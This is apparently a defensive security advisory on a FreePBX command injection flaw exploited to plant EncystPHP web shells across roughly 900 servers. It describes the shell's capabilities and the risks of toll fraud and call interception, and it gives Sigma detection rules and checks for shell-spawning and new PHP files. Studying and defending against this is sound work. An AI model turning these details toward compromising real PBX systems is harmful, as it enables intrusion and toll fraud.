900+ FreePBX Servers Compromised via Web Shell — CVE-2025-64328
Over 900 Sangoma FreePBX instances remain infected with EncystPHP web shells, deployed through a post-authentication command injection vulnerability. The Shadowserver Foundation revealed the scale of the INJ3CTOR3 campaign, with compromised servers concentrated heavily in the United States.
What Happened
In November 2025, researchers disclosed CVE-2025-64328 — a post-authentication command injection flaw in Sangoma FreePBX 17.0.2.36 and above. By early December, threat actors launched the INJ3CTOR3 operation, mass-exploiting vulnerable instances to deploy the EncystPHP web shell.
As of February 2026, over 900 instances remain compromised:
| Country | Infected Instances |
|---|---|
| United States | 401 |
| Brazil | 51 |
| Canada | 43 |
| Germany | 40 |
| France | 36 |
CISA added CVE-2025-64328 to the Known Exploited Vulnerabilities (KEV) catalog in February 2026.
How CVE-2025-64328 Works
The vulnerability exists in the FreePBX Administration panel. Authenticated users can inject arbitrary shell commands through improperly sanitized input fields, executing commands as the asterisk user — which has elevated privileges within the Elastix/FreePBX context.
Key Details:
- CVE: CVE-2025-64328
- CVSS: 8.6 (HIGH)
- Type: Post-authentication command injection
- Affected: FreePBX ≥ 17.0.2.36
- Patched: FreePBX 17.0.3
The EncystPHP Web Shell
Once attackers gain command execution, they deploy EncystPHP — a PHP-based web shell that provides:
- Persistent remote command execution
- File upload/download capabilities
- Database access
- Lateral movement staging
The web shell operates with the privileges of the asterisk service account, which typically has access to call detail records, voicemail files, SIP credentials, and system configuration.
VoIP-Specific Risks
Compromised PBX systems create unique threats beyond typical server compromise:
Toll Fraud: Attackers route international calls through compromised PBX systems, generating thousands of dollars in charges per hour. The INJ3CTOR3 campaign has been linked to outbound call activity from compromised instances.
Call Interception: With access to the asterisk process, attackers can monitor live calls, capture DTMF tones (credit card numbers entered via phone), and record conversations.
Lateral Movement: FreePBX servers often sit on internal networks with access to other infrastructure, making them valuable pivot points.
MITRE ATT&CK Mapping
| Technique | Name |
|---|---|
| T1190 | Exploit Public-Facing Application |
| T1505.003 | Server Software Component: Web Shell |
| T1059.004 | Command and Scripting Interpreter: Unix Shell |
| T1496 | Resource Hijacking (Toll Fraud) |
Detection
Sigma Rule: Web Shell in FreePBX Web Root
title: Web Shell Detected in FreePBX Web Root
status: experimental
logsource:
category: file_event
product: linux
detection:
selection:
TargetFilename|contains:
- '/var/www/html/'
- '/var/lib/asterisk/'
TargetFilename|endswith:
- '.php'
filter:
Image|contains:
- '/usr/bin/yum'
- '/usr/bin/apt'
condition: selection and not filter
level: high
Sigma Rule: Asterisk Process Spawning Shell
title: Asterisk Process Spawning Shell Commands
status: experimental
logsource:
category: process_creation
product: linux
detection:
selection:
ParentImage|endswith: '/asterisk'
Image|endswith:
- '/bin/sh'
- '/bin/bash'
condition: selection
level: critical
Manual Detection Commands
# Check for web shells in FreePBX directories
find /var/www/html -name "*.php" -newer /var/www/html/index.php -exec ls -la {} \;
# Check for suspicious asterisk child processes
ps aux | grep asterisk | grep -v grep
# Review recent PHP file modifications
find /var/www/html -name "*.php" -mtime -30 -exec md5sum {} \;
Mitigation
- Patch immediately — Update to FreePBX 17.0.3
-
Scan for web shells — Check
/var/www/html/and/var/lib/asterisk/for unauthorized PHP files - Restrict admin access — Limit FreePBX Administration panel to trusted IPs only
- Deploy WAF — Block command injection patterns in HTTP requests
- Enable FIM — Monitor web roots for unauthorized file changes
- Rotate credentials — Change all SIP passwords, AMI credentials, and admin passwords
- Audit CDR — Review Call Detail Records for unauthorized outbound calls
The Attacker's Perspective
VoIP infrastructure is a soft target. FreePBX servers are often deployed by IT teams focused on functionality, not security — left unpatched, exposed to the internet, with default or weak admin credentials. The post-authentication requirement for CVE-2025-64328 is barely a barrier when admin panels use admin:admin or credentials harvested from other breaches.
The payoff is immediate: toll fraud generates direct revenue, and the compromised server provides a persistent foothold for further operations.
The Defender's Gap
Most organizations treat their PBX like a phone system, not a server. It rarely gets the same patching cadence, monitoring, or access controls as web servers or databases. The INJ3CTOR3 campaign exploits this blind spot — 900+ servers compromised months after a patch was available tells the full story.
Need help assessing your exposure? Apply to our Beta Tester Program at theinsider-x.com — limited slots available.
Sources: TheHackerNews, Shadowserver Foundation, Fortinet FortiGuard Labs, FreePBX Security Advisory
Top comments (0)